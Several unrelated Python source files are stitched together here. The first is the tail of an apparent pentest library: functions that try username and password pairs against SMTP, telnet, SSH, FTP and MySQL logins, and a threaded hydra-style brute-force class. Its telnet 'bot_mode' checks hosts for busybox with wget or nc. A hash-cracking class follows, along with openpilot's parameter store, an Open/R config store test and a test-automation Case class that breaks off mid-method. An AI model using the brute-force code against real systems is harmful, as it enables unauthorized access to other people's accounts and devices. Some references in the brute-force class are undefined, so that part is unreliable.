if bane.telnet(host,username=user,password=pwd)==True:
print('[+]Found!!!')
else:
print('[-]Failed')
'''
def smtp(u, username,password,p=25,ehlo=True,helo=False,ttls=False):
try:
s= smtplib.SMTP(u, p)#connect to smtp server
if ehlo==True:
s.ehlo()#ehlo
if ttls==True:
s.starttls()#ttls
if helo==True:
s.helo()#helo
s.login(username, password)
return True
except Exception as e:
pass
return False
def telnet(u,username,password,p=23,timeout=5,bot_mode=False):
try:
t=xtelnet.session()
t.connect(u,username=username,password=password,p=p,timeout=timeout)
if bot_mode==True:
a=t.execute('busybox')
t.destroy()
if bot_mode==True:
if "wget" in a or "nc" in a:
return True
return False
return True
except:
pass
return False
#why i used this code for ssh brute force instead of pexpect/paramiko? Well, pexpect doesn't work on non-linux machines and paramiko gives a huge number of false positive results! you will see, with this code there are no false positives ;)
def ssh(u,username,password,p=22,timeout=5,exchange_key=None):
if os.name == 'nt':
if exchange_key!=None:#this doesn't work on windows for some reason :(
return False
l='echo y | plink -ssh -l {} -pw {} {} -P {} "hvbjkjk"'.format(username,password,u,p)
sshp = subprocess.Popen(l.split(),stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)
else:
if exchange_key:
key="-oHostKeyAlgorithms=+"+exchange_key
else:
key=""
l="sshpass -p {} ssh {} -p {} -o StrictHostKeyChecking=no -l {} {} 'exithg'".format(password,key,p,username,u) #we use the sshpass command to send the password
sshp = subprocess.Popen(l.split(),stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
ti=time.time()
while sshp.poll() is None:
time.sleep(.1)
#print(ssh.stdout.readlines())
if int(time.time()-ti)==timeout:
try:
sshp.kill()
except:
pass
return False
ou=sshp.communicate()
try:
sshp.kill()
except:
pass
time.sleep(0.1)
if exchange_key==None:
if "Their offer:" in ou[1].decode("utf-8") :
if os.name == 'nt':
return False
k=ou[1].decode("utf-8").split("offer:")[1].strip()
return ssh(u,username,password,p=p,timeout=timeout,exchange_key=k)
if "Server refused to start a shell/command" in ou[1].decode("utf-8"):
return True
if (( "unsupported" in ou[1].decode("utf-8").lower() )or( "denied" in ou[1].decode("utf-8").lower() )or("FATAL ERROR" in ou[1].decode("utf-8")) or ("refused" in ou[1].decode("utf-8").lower()) or ("Unsupported KEX algorithm" in ou[1].decode("utf-8")) or ("Bad SSH2 KexAlgorithms" in ou[1].decode("utf-8")) ):
return False
else:
return True
def ftp_anon(ip,timeout=5):
#anonymous ftp login
try:
ftp = FTP(ip,timeout=timeout)
ftp.login()
return True
except Exception as e:
pass
return False
def ftp(ip,username,password,timeout=5):
try:
i=False
ftp = FTP(ip,timeout=timeout)
ftp.login(username,password)
return True
except Exception as e:
pass
return False
def mysql(u,username,password,timeout=5,p=3306):
try:
s=mysqlcp.session(u,username,password,timeout=timeout,port=p)
s.destroy()
return True
except Exception as e:
pass
return False
class hydra:
__slots__=["stop","finish","result","logs"]
def __init__(self,u,p=22,protocol="ssh",word_list=[],threads_daemon=True,logs=True,exchange_key=None,timeout=5,ehlo=False,helo=True,ttls=False,proxy=None,proxies=None):
'''
this class is similar to the hydra tool: it performs bruteforce attacks against different services.
protocol: (set by default to: ssh) set the chosen protocol (ftp, ssh, telnet, smtp, mysql or wp) and don't forget to set the port.
'''
self.logs=logs
self.stop=False
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,p,protocol,word_list,logs,exchange_key,timeout,ehlo,helo,ttls,proxy,proxies,))
t.daemon=threads_daemon
t.start()
def crack(self,u,p,protocol,word_list,logs,exchange_key,timeout,ehlo,helo,ttls,proxy,proxies):
o=''
if protocol=="telnet":
s=telnet
if protocol=="ssh":
s=ssh
if protocol=="ftp":
s=ftp
if protocol=="smtp":
s=smtp
if protocol=="mysql":
s=mysql
if protocol=="wp":
s=wpadmin
for x in word_list:
if self.stop==True:
break
user=x.split(':')[0].strip()
pwd=x.split(':')[1].strip()
if self.logs==True:
print("[*]Trying ==> {}:{}".format(user,pwd))
if protocol=="ssh":
r=s(u,user,pwd,timeout=timeout,p=p,exchange_key=exchange_key)
elif protocol=="telnet":
r=s(u,user,pwd,timeout=timeout,p=p)
elif (protocol=="mysql"):
r=s(u,user,pwd,timeout=timeout,p=p)
elif (protocol=="ftp"):
r=s(u,user,pwd,timeout=timeout)
elif (protocol=="wp"):
if proxy:
proxy=proxy
if proxies:
proxy=random.choice(proxies)
r=s(u,user,pwd,proxy=proxy,user_agent=user_agent,cookie=cookie,timeout=timeout)
elif (protocol=="smtp"):
r=s(u,user,pwd,p=p,ehlo=ehlo,helo=helo,ttls=ttls)
else:
r=s(u,user,pwd,timeout=timeout)
if r==True:
if self.logs==True:
print("[+]Found!!!")
o="{}:{}".format(user,pwd)
break
else:
if self.logs==True:
print("[-]Failed")
self.result={u:o}
self.finish=True
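# Usage sketch (hypothetical host and word list); process_threaded(), defined
# further down in this module, can be used to block until the result is ready:
# attack = hydra('192.168.1.10', p=21, protocol='ftp', word_list=['admin:admin'])
# print(process_threaded(attack))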
class decrypt:
__slots__=["stop","finish","result","logs"]
def __init__(self,u,word_list=[],threads_daemon=True,md5_hash=False,sha1_hash=False,sha256_hash=False,sha224_hash=False,sha384_hash=False,sha512_hash=False,base64_string=False,caesar_hash=False,logs=False):
self.logs=logs
self.stop=False
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,word_list,md5_hash,sha1_hash,sha256_hash,sha224_hash,sha384_hash,sha512_hash,base64_string,caesar_hash,logs,))
t.daemon=threads_daemon
t.start()
def crack(self,u,word_list,md5_hash,sha1_hash,sha256_hash,sha224_hash,sha384_hash,sha512_hash,base64_string,caesar_hash,logs):
if self.logs==True:
print('[!]hash: '+u+'\nbruteforcing has started!!!\n')
for x in word_list:
if self.stop==True:
break
if md5_hash==True:
if dmd5(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: md5")
self.result={u:["md5:"+x]}
break
if sha1_hash==True:
if dsha1(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha1")
self.result={u:["sha1:"+x]}
break
if sha256_hash==True:
if dsha256(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha256")
self.result={u:["sha256:"+x]}
break
if sha224_hash==True:
if dsha224(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha224")
self.result={u:["sha224:"+x]}
break
if sha384_hash==True:
if dsha384(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha384")
self.result={u:["sha384:"+x]}
break
if sha512_hash==True:
if dsha512(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha512")
self.result={u:["sha512:"+x]}
break
if base64_string==True:
if base64_decode(x)==u:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: base64")
self.result={u:["base64:"+x]}
break
if caesar_hash==True:
for i in range(1,27):
if dcaesar(x,i)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: caesar | Key: "+str(i))
self.result={u:["caesar"+str(i)+":"+x]}
break
if self.result=={}:
if self.logs==True:
print('[-]No match found')
self.finish=True
def done(self):
return self.finish
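# Usage sketch: '5f4dcc3b5aa765d61d8327deb882cf99' is the md5 of 'password',
# so this should report a match (the word list itself is hypothetical):
# job = decrypt('5f4dcc3b5aa765d61d8327deb882cf99', word_list=['123456', 'password'], md5_hash=True, logs=True)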
def process_threaded(a,check_interval=0.1):
while True:
try:
if a.done()==True:
try:
return a.result
except:
pass
try:
return a.counter
except:
return
time.sleep(check_interval)
except KeyboardInterrupt:
a.stop=True
try:
return a.result
except:
pass
try:
return a.counter
except:
pass |
params.py | #!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/d to <params_dir>/<tmp>
before deleting the old <params_dir>/d directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DisableUpdates": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_NeosUpdate": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
if self._vals is None:
return None
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, exc_type, exc_value, traceback):
pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except Exception:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path + "/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db + "/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
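if __name__ == "__main__":
    # Minimal smoke-test sketch (assumes PARAMS points at a writable directory;
    # the value below is just an example):
    params = Params()
    params.put("DongleId", "0123456789abcdef")
    print(params.get("DongleId", encoding='utf8'))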
|
config_store_client_tests.py | #!/usr/bin/env python
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from openr.utils import socket
from openr.utils.serializer import serialize_thrift_object
from openr.clients import config_store_client
from openr.PersistentStore import ttypes as ps_types
from openr.LinkMonitor import ttypes as lm_types
import zmq
import unittest
from multiprocessing import Process
store_db = {'key1': serialize_thrift_object(lm_types.DumpLinksReply(
thisNodeName='node1')),
'key2': serialize_thrift_object(lm_types.DumpLinksReply(
thisNodeName='node2'))}
class ConfigStore():
def __init__(self, zmq_ctx, url):
self._cs_server_socket = socket.Socket(zmq_ctx, zmq.REP)
self._cs_server_socket.bind(url)
self._store_db = store_db
def process_request(self):
req = self._cs_server_socket.recv_thrift_obj(ps_types.StoreRequest)
if req.requestType == ps_types.StoreRequestType.LOAD:
if req.key in self._store_db:
resp = ps_types.StoreResponse(success=1, key=req.key,
data=self._store_db[req.key])
else:
resp = ps_types.StoreResponse(success=0, key=req.key)
if req.requestType == ps_types.StoreRequestType.ERASE:
if req.key in self._store_db:
resp = ps_types.StoreResponse(success=1, key=req.key)
del store_db[req.key]
else:
resp = ps_types.StoreResponse(success=0, key=req.key)
if req.requestType == ps_types.StoreRequestType.STORE:
store_db[req.key] = req.data
resp = ps_types.StoreResponse(success=1, key=req.key)
self._cs_server_socket.send_thrift_obj(resp)
class TestConfigStoreClient(unittest.TestCase):
def test(self):
num_req = 6
ctx = zmq.Context()
def _cs_server():
cs_server = ConfigStore(ctx, "inproc://openr_config_store_cmd")
for _ in range(num_req):
cs_server.process_request()
def _cs_client():
cs_client_inst = config_store_client.ConfigStoreClient(
ctx, "inproc://openr_config_store_cmd")
self.assertEqual(cs_client_inst.load('key1'), store_db['key1'])
with self.assertRaises(Exception):
cs_client_inst.load('key3')
self.assertTrue(cs_client_inst.erase('key1'))
with self.assertRaises(Exception):
cs_client_inst.load('key1')
value = serialize_thrift_object(lm_types.DumpLinksReply(
thisNodeName='node5'))
self.assertTrue(cs_client_inst.store('key5', value))
self.assertEqual(cs_client_inst.load('key5'), value)
p = Process(target=_cs_server)
p.start()
q = Process(target=_cs_client)
q.start()
p.join()
q.join()
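# Conventional entry point so the test module can be run directly (an addition;
# the original may rely on an external test runner):
if __name__ == '__main__':
    unittest.main()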
|
Case.py | #! /usr/bin/env python3
# -*- coding: UTF-8 -*-
__author__ = 'Sean Yu'
__mail__ = 'try.dash.now@gmail.com'
import os,time,re
import sys
import traceback
libpath = os.path.sep.join([os.path.dirname(os.getcwd()),'lib'])
if libpath not in sys.path:
sys.path.insert(0,libpath)
libpath = os.path.sep.join([os.path.dirname(os.getcwd()),'product'])
if libpath not in sys.path:
sys.path.insert(0,libpath)
#from WebSession import WebSession
from common import DumpStack
import threading
reCtrl = re.compile("^\s*ctrl\s*:(.*)", re.I)
reAlt = re.compile("^\s*alt\s*:(.*)", re.I)
reCtrlAlt = re.compile("^\s*ctrlalt\s*:(.*)", re.I)
reRetry = re.compile("^\s*try\s+([0-9]+)\s*:(.*)", re.I)
reNoAction =re.compile("[\s]*NOACTION[\s]*:([\s\S]*)",re.IGNORECASE)
reNoWait =re.compile("[\s]*NOWAIT[\s]*:([\s\S]*)",re.IGNORECASE)
reNo = re.compile("^\s*NO\s*:(.*)", re.I)
reSegementIndex =re.compile ('\s*(SETUP|RUN|TEARDOWN)\s*.\s*([+-]*\d+)',re.I)
from common import csvstring2array,csvfile2array
if os.name!='nt':
import queue
else:
import Queue as queue
class Case(object):
LogDir=None# './'
Name=None# 'DefaultTestCaseName'
SUTs=None#{}
Session=None #{}
Steps=None#[[],[],[]]
logger=None
arg =None#[]
kwarg = None#{}
argvs=None#[]
kwargvs =None#[]
thInteraction =None
bCaseEnd=False
MoniterInterval =1 #second
ServerPort=50000
ServerHost =None#'localhost'
#CasePort=50001
#CaseHost ='localhost'
SocketResponse=None#''
Sock=None
Mode= None#'FULL'
breakpoint=None#[[],[],[]]
flagInteraction=False
cp=None#[0,1]
thWebclient =None
CaseFailed= True
DebugWhenFailed=False
qCommand=queue.Queue()
fRunning= False
RecordReplay=None#[]
IndexOfSutOutput =None
SUTNAME =None#[]
InitialDone=False
fActionInProgress=False
lockOutput = None
lockRR =None
ErrorMessage =None # to store the error message
def SaveCase2File(self):
import csv
MAX_LENGTH_OF_CELL =256
csvfile = '../case/manual/%s'%(self.Name+time.strftime("_%Y%m%d_%H%M%S", time.localtime()))
with open(csvfile, 'w') as f:
writer = csv.writer(f)
lastcol2write = 4
for row in self.RecordReplay:
maxlen= 0
row = row[:lastcol2write]
for item in row:
l = len(str(item))
if l> maxlen:
maxlen = l
if maxlen > MAX_LENGTH_OF_CELL:
index = 0
block =0
maxcol = len(row)
newrow =[]
while index <maxlen:
for i in range(maxcol):
newrow.append(row[i][block*MAX_LENGTH_OF_CELL:(block+1)*MAX_LENGTH_OF_CELL])
writer.writerow(newrow)
block+=1
index=block*MAX_LENGTH_OF_CELL
else:
writer.writerow(row)
writer.writerow(['#!---'])
def GetCurrentSutOutputIndex(self,sut):
recordIndex = len(self.RecordReplay)-1
colIndex = 4 + self.SUTNAME.index(sut )
offset = len(self.RecordReplay[recordIndex][colIndex])
return [recordIndex,offset]
def UpdateSutOutput2RecordReplay(self, sutname, data):
self.lockRR.acquire()
colIndex = 4 + self.SUTNAME.index(sutname )
rowIndex = len(self.RecordReplay)-1
while len (self.RecordReplay[rowIndex])<colIndex+2:
self.RecordReplay[rowIndex].append('')
self.RecordReplay[rowIndex][colIndex] = '''%s'''%(str(self.RecordReplay[rowIndex][colIndex])+ data)
self.lockRR.release()
def AddCmd2RecordReplay(self,cmd):
newrecord = cmd[1:]
if cmd[0]=='__case__':
newrecord[0]='''#%s'''%newrecord[0]
else:
newrecord =cmd[:]
while len(newrecord)<4:
newrecord.append('')
for sut in self.SUTNAME:
newrecord.append('')
self.lockOutput.acquire()
self.RecordReplay.append(newrecord)
self.lockOutput.release()
def AddClient(self, clientid):
#lock= threading.Lock()
self.lockOutput.acquire()
self.IndexOfSutOutput.update({clientid:{}})
for sut in self.Session.keys():
self.IndexOfSutOutput[clientid].update({sut:self.GetCurrentSutOutputIndex(sut)})
time.sleep(2)
self.lockOutput.release()
return 'Client %s Added'%clientid
def RequestSUTOutput(self,client, sut):
response = ''
self.lockOutput.acquire()
try:
[recordIndex, offset] = self.IndexOfSutOutput[client][sut]
cRecordIndex = len(self.RecordReplay)-1
index = recordIndex
colIndex =4 + self.SUTNAME.index(sut )
response = self.RecordReplay[index][colIndex][offset:]
index +=1
while cRecordIndex>=index:
response = response + str(self.RecordReplay[index][colIndex]) #[:]
index +=1
self.IndexOfSutOutput[client][sut]=self.GetCurrentSutOutputIndex(sut)
time.sleep(0.2)
except Exception as e:
import traceback
print (traceback.format_exc())
#print('#####'*160)
response = DumpStack(e)
self.error(response)
self.lockOutput.release()
return response
def QuerySUTOutput(self):
self.info('QuerySUTOutput() is called,')
while self.fActionInProgress:
time.sleep(1)
self.info('QuerySUTOutput(), Expect switchs to search in InteractionBuffer')
for ses in self.SUTs:
try:
self.Session[ses].SetInteractionMode(True)
except Exception as e:
print(traceback.format_exc())
if os.name !='nt':
import pexpect
while (not self.bCaseEnd) and self.flagInteraction :
for sutname in self.SUTs.keys():
acquired =self.lockOutput.acquire()
try:
self.Session[sutname].match=None
if self.InitialDone and (not self.Session[sutname].fSending):
if not acquired:
continue
if os.name =='nt':
try:
try:
getdata =self.Session[sutname].read_until('.*',0.01)
except:
pass
self.Session[sutname].match =self.Session[sutname].InteractionBuffer ##self.Session[sutname].output#
self.Session[sutname].InteractionBuffer=''
except Exception as e:
print('error in interaction buffer')
self.Session[sutname].match =''
else:
import pexpect
self.Session[sutname].expect(['.+',pexpect.TIMEOUT], 0.01)
match = self.Session[sutname].match
output=''
try:
if os.name =='nt':
if match!='':# and match!=pexpect.TIMEOUT :
output = match #match.group().decode("utf-8")
else:
if match and match!=pexpect.TIMEOUT :
output = match.group().decode('utf-8') #match.group().decode("utf-8")
except Exception as e:
self.error(DumpStack(e))
if len(output)>0:
if os.name !='nt':
self.Session[sutname].AppendData2InteractionBuffer(output)
self.UpdateSutOutput2RecordReplay(sutname, output)
except Exception as e:
if str(e).startswith('End Of File (EOF).'):
try:
self.Session[sutname].SendLine('')
except Exception as e:
self.error(DumpStack(e))
else:
self.error(DumpStack(e))
self.lockOutput.release()
time.sleep(0.49)
print('Query SUT Output ended')
#time.sleep(0.2)
def info(self,msg):
self.logger.info(msg)
self.UpdateSutOutput2RecordReplay('__case__', msg)
def debug(self,msg):
self.logger.debug(msg)
self.UpdateSutOutput2RecordReplay('__case__', msg)
def error(self,msg):
self.logger.error(msg)
self.UpdateSutOutput2RecordReplay('__case__', msg)
def __init__(self,name,suts,steps=None,mode=None,DebugWhenFailed=False,logdir=None,caseconfigfile=None):
"""
init a Test Case instance
"""
self.Name= 'DefaultTestCaseName'
self.SUTs={}
self.Session={}
self.Steps=[[],[],[]]
self.arg =[]
self.kwarg = {}
self.argvs=[]
self.kwargvs =[]
self.ServerHost ='localhost'
self.SocketResponse=''
self.Mode= 'FULL'
self.breakpoint=[[],[],[]]
self.cp=[0,1]
self.qCommand=queue.Queue()
self.RecordReplay=[]
self.IndexOfSutOutput= {'client':{'tel':[0,0]}}
self.SUTNAME =[]
if not steps :
steps = [[],[],[]]
if not mode:
mode ='FULL'
if not logdir:
logdir = os.getcwd()
if not caseconfigfile:
caseconfigfile = './case.cfg'
import threading
self.lockOutput =threading.Lock()
self.lockRR =threading.Lock()
self.DebugWhenFailed=DebugWhenFailed
a = csvfile2array(caseconfigfile)
cfg={}
for i in a:
try:
if len(i)>0:
cfg.update({i[0].strip().lower():i[1].strip()})
except Exception as e:
print(e.__str__())
try:
self.ServerHost = cfg['serverhost']
self.ServerPort = int(cfg['serverport'])
except:
pass
self.Name= name
if len(self.Name)>80:
self.Name=self.Name[0:80]
import re
self.Name = re.sub(r"[^\w]", "", self.Name)
self.LogDir = '%s%s%s'%(os.path.abspath(logdir),os.sep,'%s%s'%(self.Name,time.strftime("_%Y%m%d_%H%M%S", time.localtime())))
#self.LogDir = self.LogDir.replace('\\',os.path.sep).replace('/', os.path.sep).replace(':','')
os.mkdir(self.LogDir)
self.Setup=steps[0]
self.Run = steps[1]
self.Teardown = steps[2]
self.Steps=steps
self.SUTs = suts
self.Mode = mode.upper()
import logging
logfile = self.LogDir+os.sep+"TC_"+self.Name+".log"
logging.basicConfig( level = logging.DEBUG, format = self.Name+' %(asctime)s -%(levelname)s: %(message)s' )
from common import CLogger
self.logger = CLogger(self.Name)
self.hdrlog = logging.FileHandler(logfile)
self.logger.setLevel(logging.DEBUG)
self.hdrlog .setFormatter(logging.Formatter('%(asctime)s -%(levelname)s: %(message)s'))
self.logger.addHandler(self.hdrlog )
sutstring =''
self.SUTNAME= sorted(suts.keys())
self.SUTNAME.append('__case__')
self.RecordReplay = [['[cs]'], ['#VAR'],['#SETUP']]
newrecord = ['#SUTNAME', 'COMMAND', 'EXPECT', 'WAIT TIME(s)']
before1staction= ['#', '','','',]
for sut in self.SUTNAME:
newrecord.append(sut+' OUTPUT')
before1staction.append('')
self.RecordReplay.append(newrecord)
self.RecordReplay.append(before1staction)
thList =[]
for sut in self.SUTs.keys() :
if sut =='__case__':
continue
